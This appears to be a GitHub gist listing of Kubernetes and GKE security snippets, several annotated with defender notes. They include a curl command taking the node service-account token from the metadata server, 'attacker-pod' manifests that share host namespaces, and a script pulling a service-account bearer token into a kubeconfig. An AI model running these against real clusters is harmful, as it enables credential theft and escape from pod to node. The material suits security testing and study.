View gke-pod-hacks.sh
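# Fetch a short-lived OAuth2 access token for the instance's default service
# account from the Google Cloud metadata server and export it as TOKEN.
# -k is dropped: the endpoint is plain HTTP, so disabling TLS verification has
# no effect here and is a risky flag to carry into other requests.
# Defender note: a pod can only read this token when the node's metadata
# server is reachable from workloads; GKE Workload Identity gives pods a
# per-workload identity instead of the node's service account.
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token |
  jq -r '.access_token')
export TOKEN

# List all repositories in the eu.gcr.io registry using the access token.
# NOTE(review): -u places the token on the curl command line, where it is
# visible in the process list while the request runs.
curl -u "oauth2accesstoken:${TOKEN}" https://eu.gcr.io/v2/_catalog

# Docker login: the token is fed on stdin so it does not appear in argv.
printf '%s\n' "${TOKEN}" | docker login --username oauth2accesstoken --password-stdin eu.gcr.io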
View go-int-down-casting.ql
import go | |
import semmle.go.dataflow.DataFlow | |
import semmle.go.dataflow.TaintTracking | |
/**
 * A function in Go's `strconv` package that parses a string into an integer:
 * `strconv.Atoi` or `strconv.ParseInt`.
 */
class IntegerSource extends Function {
  IntegerSource() { this.hasQualifiedName("strconv", ["Atoi", "ParseInt"]) }
}
View ghidra.sh
# Run Ghidra from the blacktop/ghidra image with its GUI on the host X display.
# del_stopped is defined outside this snippet; presumably it removes a stopped
# container with the given name (confirm against its definition).
ghidra() {
  del_stopped ghidra

  # Grant local root connections access to the X server for this run. This
  # admits every local root-owned client, not only this container, and the
  # shared /tmp/.X11-unix socket lets the container reach the whole display.
  xhost +local:root

  docker run --init -it --rm \
    --name ghidra \
    --cpus 2 \
    --memory 4g \
    -e MAXMEM=4G \
    -v /etc/localtime:/etc/localtime:ro \
    -v /tmp/.X11-unix:/tmp/.X11-unix \
    -v "${HOME}/.gtkrc:/root/.gtkrc" \
    -e "DISPLAY=unix${DISPLAY}" \
    -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra \
    -v /home/user1/Work/ghidra:/root/storage \
    blacktop/ghidra

  # Withdraw the X access grant once the container has exited.
  xhost -local:root
}

ghidra
View psp.yml
# PodSecurityPolicy named developers-psp. The fields visible here refuse
# privileged containers, privilege escalation and the host network, PID and
# IPC namespaces.
# NOTE(review): policy/v1beta1 PodSecurityPolicy was deprecated in Kubernetes
# 1.21 and removed in 1.25; newer clusters need Pod Security Admission or a
# policy engine to express the same restrictions.
# NOTE(review): a PSP only takes effect when the PodSecurityPolicy admission
# controller is enabled and the pod's user or service account is authorized
# to "use" this policy. Confirm both for the target cluster.
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: developers-psp
spec:
  privileged: false
  allowPrivilegeEscalation: false
  hostNetwork: false
  hostPID: false
  hostIPC: false
View pod-to-node.yml
# Pod manifest that opts into the node's PID, IPC and network namespaces.
# Defender note: each of these flags removes a layer of isolation between the
# pod and its node. The Baseline Pod Security Standard rejects a pod that sets
# any of them, so admission control should deny this spec in namespaces that
# tenants can deploy to, and audit logs should alert on pod creation with
# host namespaces enabled.
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod
  name: attacker-pod
spec:
  hostPID: true      # shares the node's process namespace
  hostIPC: true      # shares the node's IPC namespace
  hostNetwork: true  # shares the node's network namespace
View sa-to-kubeconfig.sh
#!/bin/bash | |
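# Collect the pieces of a kubeconfig for the developer-sa service account in
# the developers namespace. Each value is assigned first and exported after,
# so a failing kubectl call is not masked by the exit status of `export`.

# API server URL: last field of the cluster-info banner line. Older kubectl
# prints "Kubernetes master", kubectl 1.20+ prints "Kubernetes control plane",
# so both are matched. sed strips the ANSI colour codes kubectl emits.
TARGET_CONFIGSERVER=$(kubectl cluster-info | grep -E 'master|control plane' | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g')
export TARGET_CONFIGSERVER

# Name of the service account's token Secret.
# NOTE(review): .secrets[0].name is empty on Kubernetes 1.24+, where token
# Secrets are no longer auto-created for service accounts. Confirm the
# cluster version before relying on this lookup.
TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}')
export TARGET_TOKENNAME

# Decoded bearer token. A Secret-based service account token does not expire,
# so treat this variable and any kubeconfig built from it as a credential.
TARGET_CONFIGTOKEN=$(kubectl -n developers get secret "${TARGET_TOKENNAME}" -o "jsonpath={.data.token}" | base64 -d)
export TARGET_CONFIGTOKEN

# Cluster CA certificate, left base64-encoded as stored in the Secret.
TARGET_CONFIGCRT=$(kubectl -n developers get secret "${TARGET_TOKENNAME}" -o "jsonpath={.data['ca\.crt']}")
export TARGET_CONFIGCRT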
cat <<EOF | |
apiVersion: v1 | |
kind: Config |
View k8s-sa-pod-crud.yml
apiVersion: v1 | |
kind: Namespace | |
metadata: | |
name: developers | |
--- | |
apiVersion: v1 | |
kind: ServiceAccount | |
metadata: |
View pod-node-access.yml
# Pod manifest that shares the node's PID, IPC and network namespaces.
# Defender note: with all three enabled the pod is no longer isolated from the
# node's processes, IPC objects or network stack. The Baseline Pod Security
# Standard rejects any of these settings; restrict who may create such pods
# and review audit logs for pod specs that enable host namespaces.
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: ubuntu-1
  name: ubuntu-1
spec:
  hostPID: true      # shares the node's process namespace
  hostIPC: true      # shares the node's IPC namespace
  hostNetwork: true  # shares the node's network namespace
View mongo-api-client.js
'use strict' | |
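// MongoDB Atlas API credentials and the staging/production group ids.
// Values are read from same-named environment variables so that real secrets
// never have to be written into this file; the literals are the original
// placeholders and are used only when a variable is unset or empty.
const MONGO_ATLAS_USERNAME = process.env.MONGO_ATLAS_USERNAME || 'USER'
const MONGO_ATLAS_APIKEY = process.env.MONGO_ATLAS_APIKEY || 'APIKEY'
const MONGO_ATLAS_STAGING_GROUP_ID = process.env.MONGO_ATLAS_STAGING_GROUP_ID || 'ID1'
const MONGO_ATLAS_PRODUCTION_GROUP_ID = process.env.MONGO_ATLAS_PRODUCTION_GROUP_ID || 'ID2'
// Events endpoint template; {{GROUP-ID}} is a placeholder for one of the group ids above.
const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events'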
View gist:3ef7f1e208d46771cb79b6440028b787
GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1 | |
Authorization: Bearer $TOKEN | |
Host: 192.168.12.10:6443 | |
Connection: upgrade | |
Upgrade: websocket |